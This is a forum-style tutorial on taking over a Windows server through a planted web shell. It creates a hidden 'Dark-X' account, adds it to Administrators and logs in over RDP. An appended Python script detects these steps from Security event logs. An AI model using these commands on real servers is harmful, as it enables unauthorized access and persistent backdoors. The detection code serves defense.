Well, this is different from the *Unix process: there we use an exploit, here we use only commands.
And yes, if we are not able to execute those commands we can try some alternatives, but the chances that they work are really low... I am going to explain why a bit later.
What we need:
-Shell attached on some site
-Server must be running on Windows OS
We access our shell, go to the command console, and first check who we are:
whoami
This command checks which user we are running as, and it can show us something like:
Administrator or SystAdmin
That's good, we are running as administrator. Cool, let's see how many users there are on the server:
Code:
net user
And we are going to see something like:
C:\Users\Administrator>net user
\\SERVER **********
----------------------------------------------------------
Administrator Guest Remote
__________________________________
Command Successfully executed.
So this means that there are 3 users on this server:
Administrator, Guest, Remote
So we can try to add a new user, e.g. Dark-X
Code:
net user Dark-X /add
This command is for adding a user with a password:
Code:
net user Username Password /add
When we execute this command we will get a window saying:
Code:
___________________________
Command Successfully executed.
Now let's check:
net user Dark-X
It will display something like this:
Username: Dark-X
Name: Dark-X
Last Time Online: XX:XX:XX-XX/XX
Local Group: *User
So we are in the User group. We need to be in the Administrator or Remote group to connect over Remote Desktop Connection, so we type:
Code:
net localgroup Administrators Dark-X /add
and we will see this line again:
Command Successfully executed.
If we see this, it means that we have added our user to the Administrators group. Now we can try to connect over RDP and access the whole server.
Windows RDP Starting:
Start Menu=>All Programs=>Accessories=>Remote Desktop Connection
Linux:
Open a terminal and write: rdesktop -u Username -p Password IP
or
rdesktop IP
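Seen from the defender's side, every step above leaves a record in the Windows Security log: process creation (4688), account creation (4720), a member added to a local group (4732) and a RemoteInteractive logon (4624, logon type 10). The following is an added example, not part of the original post, that correlates those events by SID; the flat record layout, the list of web-server process names and all sample events are assumptions constructed for illustration.

```python
WEB_PARENTS = {"w3wp.exe", "httpd.exe", "php-cgi.exe"}  # assumed web-server images
WATCHED = {"whoami.exe", "net.exe", "net1.exe"}
PRIV_GROUPS = {"S-1-5-32-544": "Administrators", "S-1-5-32-555": "Remote Desktop Users"}

def image(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Added example: (severity, message) findings for time-ordered Security events."""
    findings, tainted, created, elevated = [], set(), {}, set()
    for ev in events:
        eid = ev["EventID"]
        if eid == 4688:  # process creation; ProcessId is the creator's PID
            # Tainted = spawned by a web server or by an already tainted process.
            if image(ev["ParentProcessName"]) in WEB_PARENTS or ev["ProcessId"] in tainted:
                tainted.add(ev["NewProcessId"])
                if image(ev["NewProcessName"]) in WATCHED:
                    findings.append(("high", "web server descendant ran: " + ev["CommandLine"]))
        elif eid == 4720:  # user account created
            created[ev["TargetSid"]] = ev["TargetUserName"]
            findings.append(("medium", "account created: " + ev["TargetUserName"]))
        elif eid == 4732 and ev["TargetSid"] in PRIV_GROUPS and ev["MemberSid"] in created:
            elevated.add(ev["MemberSid"])  # new account put into a privileged local group
            findings.append(("high", created[ev["MemberSid"]] + " added to "
                             + PRIV_GROUPS[ev["TargetSid"]]))
        elif eid == 4624 and ev["LogonType"] == 10 and ev["TargetUserSid"] in elevated:
            findings.append(("critical", "RDP logon by " + ev["TargetUserName"]
                             + " from " + ev["IpAddress"]))
    return findings

def proc(ppid, pid, parent, child, cmd):  # helper that builds a constructed 4688 record
    return {"EventID": 4688, "ProcessId": ppid, "NewProcessId": pid,
            "ParentProcessName": parent, "NewProcessName": child, "CommandLine": cmd}

SYS, SID = "C:\\Windows\\System32\\", "S-1-5-21-1111111111-2222222222-3333333333-1005"
SAMPLE = [  # constructed events, not real log data
    proc(1232, 2468, SYS + "inetsrv\\w3wp.exe", SYS + "cmd.exe", "cmd.exe /c whoami"),
    proc(2468, 2500, SYS + "cmd.exe", SYS + "whoami.exe", "whoami"),
    proc(900, 3000, "C:\\Windows\\explorer.exe", SYS + "net.exe", "net user"),  # benign admin
    proc(2468, 2512, SYS + "cmd.exe", SYS + "net.exe", "net user Dark-X /add"),
    {"EventID": 4720, "TargetUserName": "Dark-X", "TargetSid": SID},
    {"EventID": 4732, "TargetSid": "S-1-5-32-544", "MemberSid": SID},
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "Dark-X",
     "TargetUserSid": SID, "IpAddress": "203.0.113.7"},
]

if __name__ == "__main__":
    for severity, message in detect(SAMPLE):
        print(severity.upper(), message)
```

Event 4688 and its command line are only recorded when process-creation auditing and command-line inclusion are enabled by policy; without them the 4720, 4732 and 4624 correlation still works.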